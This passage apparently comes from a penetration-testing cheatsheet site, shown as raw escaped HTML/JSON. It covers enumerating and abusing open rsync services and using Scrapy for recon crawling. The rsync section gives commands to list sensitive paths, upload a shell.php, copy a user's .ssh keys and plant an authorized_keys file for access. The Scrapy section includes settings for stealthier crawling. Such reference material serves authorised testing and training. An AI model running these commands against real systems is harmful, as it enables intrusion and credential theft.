style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e --script rsync-list-modules \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 
id=\"list-available-modules-shares\"\u003eList Available Modules (Shares)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List modules (no auth)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync rsync://\u0026lt;ip\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# nc banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Then type: #list\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"enumerate-files-in-a-module\"\u003eEnumerate Files in a Module\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/subdir/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Recursive listing of entire module\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -r --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"download-files\"\u003eDownload Files\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download single file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/file.txt ./\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download entire module\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./local_copy/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With 
credentials\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync --password-file\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003epass.txt rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dry run (see what would be downloaded)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --dry-run rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"upload-files\"\u003eUpload Files\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Upload single file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av ./shell.php rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Upload directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ersync -av ./payload/ rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/uploads/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With password file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync --password-file\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003epass.txt -av ./file rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"high-value-paths-to-check\"\u003eHigh-Value Paths to Check\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/home/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/root/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/etc/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/backup/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/var/www/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only 
rsync://\u0026lt;ip\u0026gt;/.ssh/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-key-theft--planting\"\u003eSSH Key Theft \u0026amp; Planting\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download .ssh directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av rsync://\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/ ./stolen_keys/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Plant authorized_keys (if write access)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av ~/.ssh/id_rsa.pub rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e --script rsync-list-modules \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"Rsync"},{"content":"Scrapy 
Cheatsheet Type: Fast, high-level web crawling and scraping framework for Python — used to build custom spiders that extract links, emails, subdomains, and other data from target sites\nInstallation # Via pip (recommended) pip3 install scrapy # Via apt sudo apt install python3-scrapy # Via conda conda install -c conda-forge scrapy # Verify scrapy version Basic Usage # Quick one-off crawl from the shell (no project needed) scrapy shell \u0026lt;url\u0026gt; scrapy shell https://example.com # Fetch a single page and dump to stdout scrapy fetch https://example.com # View the page as Scrapy sees it (opens in browser) scrapy view https://example.com # Run a standalone spider file scrapy runspider myspider.py Command-Line Tools Command Description scrapy startproject \u0026lt;name\u0026gt; Create a new project skeleton scrapy genspider \u0026lt;name\u0026gt; \u0026lt;domain\u0026gt; Generate a new spider from template scrapy crawl \u0026lt;spider\u0026gt; Run a spider inside a project scrapy runspider \u0026lt;file.py\u0026gt; Run a self-contained spider file scrapy shell \u0026lt;url\u0026gt; Interactive scraping shell (test selectors) scrapy fetch \u0026lt;url\u0026gt; Download a page using Scrapy\u0026rsquo;s downloader scrapy view \u0026lt;url\u0026gt; Open the fetched page in a browser scrapy parse \u0026lt;url\u0026gt; --spider=\u0026lt;name\u0026gt; Parse a URL with a spider\u0026rsquo;s callback scrapy list List available spiders in the project scrapy settings --get \u0026lt;KEY\u0026gt; Print a settings value scrapy bench Run a quick benchmark crawl Common crawl Flags Flag Description -o \u0026lt;file\u0026gt; Output scraped items to file (.json, .jsonl, .csv, .xml) -O \u0026lt;file\u0026gt; Same as -o but overwrites instead of appending -a \u0026lt;name\u0026gt;=\u0026lt;value\u0026gt; Pass an argument to the spider (e.g. 
-a domain=example.com) -s \u0026lt;KEY\u0026gt;=\u0026lt;value\u0026gt; Override a setting at runtime -L \u0026lt;level\u0026gt; Log level (DEBUG, INFO, WARNING, ERROR) --logfile \u0026lt;file\u0026gt; Write logs to a file --nolog Disable logging -t \u0026lt;format\u0026gt; Output format when not inferred from extension Common Commands # Create a project scrapy startproject recon # Generate a spider scoped to a domain cd recon scrapy genspider links example.com # Run the spider and export results scrapy crawl links -o results.json # Run a standalone spider with output scrapy runspider spider.py -o output.jsonl # Pass arguments into a spider scrapy crawl links -a domain=example.com -a depth=2 # Override settings on the fly (respect robots.txt off, set delay) scrapy crawl links -s ROBOTSTXT_OBEY=False -s DOWNLOAD_DELAY=1 # Limit log noise scrapy crawl links -L WARNING -o out.csv # Test CSS / XPath selectors interactively scrapy shell \u0026#34;https://example.com\u0026#34; Inside the Scrapy Shell # After: scrapy shell \u0026#34;https://example.com\u0026#34; response.url # Current URL response.status # HTTP status code response.headers # Response headers # CSS selectors response.css(\u0026#39;a::attr(href)\u0026#39;).getall() # All link hrefs response.css(\u0026#39;title::text\u0026#39;).get() # Page title # XPath selectors response.xpath(\u0026#39;//a/@href\u0026#39;).getall() # All link hrefs response.xpath(\u0026#39;//img/@src\u0026#39;).getall() # All image sources # Follow a link fetch(\u0026#39;https://example.com/about\u0026#39;) # Regex over the body (e.g. 
emails) import re re.findall(r\u0026#39;[\\w.+-]+@[\\w-]+\\.[\\w.-]+\u0026#39;, response.text) Minimal Recon Spider # save as spider.py, run with: scrapy runspider spider.py -o out.json import scrapy from urllib.parse import urlparse class ReconSpider(scrapy.Spider): name = \u0026#34;recon\u0026#34; start_urls = [\u0026#34;https://example.com\u0026#34;] def parse(self, response): # Collect all links and follow same-domain ones for href in response.css(\u0026#39;a::attr(href)\u0026#39;).getall(): yield {\u0026#34;link\u0026#34;: response.urljoin(href)} if urlparse(response.urljoin(href)).netloc == urlparse(response.url).netloc: yield response.follow(href, callback=self.parse) Useful Settings (settings.py / -s overrides) Setting Description ROBOTSTXT_OBEY Whether to honour robots.txt (default True) DOWNLOAD_DELAY Seconds between requests (politeness / rate limiting) CONCURRENT_REQUESTS Max simultaneous requests DEPTH_LIMIT Max crawl depth (0 = unlimited) USER_AGENT Custom User-Agent string RETRY_TIMES Number of retries on failed requests HTTPCACHE_ENABLED Cache responses locally to avoid re-fetching AUTOTHROTTLE_ENABLED Auto-adjust delay based on server load # Example: stealthier crawl scrapy crawl recon \\ -s DOWNLOAD_DELAY=2 \\ -s CONCURRENT_REQUESTS=2 \\ -s AUTOTHROTTLE_ENABLED=True \\ -s USER_AGENT=\u0026#34;Mozilla/5.0\u0026#34; Notes Active — Scrapy makes real HTTP requests to the target; only crawl in-scope assets. Set ROBOTSTXT_OBEY=False only when authorised; by default Scrapy respects robots.txt. Use DOWNLOAD_DELAY / AUTOTHROTTLE to avoid hammering targets and tripping WAFs. Great base for custom recon crawlers — [[reconspider]] is a Scrapy-based spider built exactly for this. Export to JSON/JSONL then post-process with jq to extract emails, subdomains, and links. 
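The Notes above recommend exporting to JSONL and post-processing the result. The Python below is an added example, not part of this cheatsheet and not Scrapy's own code: it does that post-processing offline, reading the {"link": ...} items the minimal recon spider emits, separating in-scope URLs from out-of-scope hosts, listing discovered subdomains, and harvesting e-mail addresses with the same regex as the shell snippet. The target domain example.com, the JSONL lines and the page text are constructed sample inputs. The in_scope() helper goes beyond the spider's exact-netloc comparison: it also accepts subdomains of the target while rejecting look-alike hosts such as example.com.evil.tld, so it can replace the equality check inside parse() when subdomains are in scope.

```python
import json
import re
from urllib.parse import urlparse

# Same e-mail pattern the scrapy shell snippet above uses
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def in_scope(url, domain):
    """True if the URL's host is `domain` itself or a subdomain of it.

    The minimal spider compares netloc for equality, so it never follows
    dev.example.com or api.example.com. This suffix check does, while still
    rejecting look-alikes such as example.com.evil.tld.
    """
    host = (urlparse(url).hostname or "").lower()
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)


def triage_links(jsonl_text, domain):
    """Bucket crawled links from JSONL output (one {"link": url} per line,
    the shape `scrapy runspider spider.py -o out.jsonl` writes)."""
    in_scope_urls, subdomains, out_of_scope_hosts = set(), set(), set()
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        url = json.loads(line)["link"]
        parts = urlparse(url)
        if parts.scheme not in ("http", "https"):
            continue  # mailto:, javascript:, tel: ... are not crawl targets
        host = (parts.hostname or "").lower()
        if in_scope(url, domain):
            in_scope_urls.add(url)
            if host != domain.lower():
                subdomains.add(host)
        else:
            out_of_scope_hosts.add(host)
    return {
        "in_scope": sorted(in_scope_urls),
        "subdomains": sorted(subdomains),
        "out_of_scope_hosts": sorted(out_of_scope_hosts),
    }


def harvest_emails(text, domain=""):
    """Extract e-mail addresses from page text, optionally keeping only the
    target domain's. The regex's trailing [\\w.-]+ also swallows a
    sentence-ending dot, so that is stripped before de-duplication."""
    emails = {m.lower().rstrip(".") for m in EMAIL_RE.findall(text)}
    if domain:
        emails = {e for e in emails if e.endswith("@" + domain.lower())}
    return sorted(emails)


# Constructed sample data (not real crawl output)
SAMPLE_JSONL = """\
{"link": "https://example.com/about"}
{"link": "https://dev.example.com/login"}
{"link": "https://api.example.com/v1/"}
{"link": "https://example.com.evil.tld/phish"}
{"link": "https://cdn.thirdparty.net/app.js"}
{"link": "mailto:info@example.com"}
{"link": "https://dev.example.com/login"}
"""
SAMPLE_BODY = ("Contact: Admin@example.com, sales@example.com. "
               "Vendor support: help@thirdparty.net")

if __name__ == "__main__":
    print(json.dumps(triage_links(SAMPLE_JSONL, "example.com"), indent=2))
    print(harvest_emails(SAMPLE_BODY, "example.com"))
```

Feed it the file written by `-o out.jsonl` instead of SAMPLE_JSONL and the out_of_scope_hosts list doubles as a quick check that the crawl stayed inside the authorised scope.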
","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/web-crawling/scrapy/","summary":"\u003ch1 id=\"scrapy-cheatsheet\"\u003eScrapy Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Fast, high-level web crawling and scraping framework for Python — used to build custom spiders that extract links, emails, subdomains, and other data from target sites\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via pip (recommended)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via apt\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install python3-scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via conda\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003econda install -c conda-forge scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 
Verify\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy version\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quick one-off crawl from the shell (no project needed)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy shell \u0026lt;url\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy shell https://example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Fetch a single page and dump to stdout\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy fetch https://example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# View the page as Scrapy sees it (opens in browser)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy view https://example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 
style=\"color:#75715e\"\u003e# Run a standalone spider file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy runspider myspider.py\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"command-line-tools\"\u003eCommand-Line Tools\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eCommand\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy startproject \u0026lt;name\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCreate a new project skeleton\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy genspider \u0026lt;name\u0026gt; \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGenerate a new spider from template\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy crawl \u0026lt;spider\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun a spider inside a project\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy runspider \u0026lt;file.py\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun a self-contained spider file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy shell \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInteractive scraping shell (test selectors)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy fetch \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDownload a page using Scrapy\u0026rsquo;s 
downloader\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy view \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOpen the fetched page in a browser\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy parse \u0026lt;url\u0026gt; --spider=\u0026lt;name\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eParse a URL with a spider\u0026rsquo;s callback\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy list\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList available spiders in the project\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy settings --get \u0026lt;KEY\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint a settings value\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy bench\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun a quick benchmark crawl\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-crawl-flags\"\u003eCommon crawl Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput scraped items to file (\u003ccode\u003e.json\u003c/code\u003e, \u003ccode\u003e.jsonl\u003c/code\u003e, \u003ccode\u003e.csv\u003c/code\u003e, \u003ccode\u003e.xml\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-O 
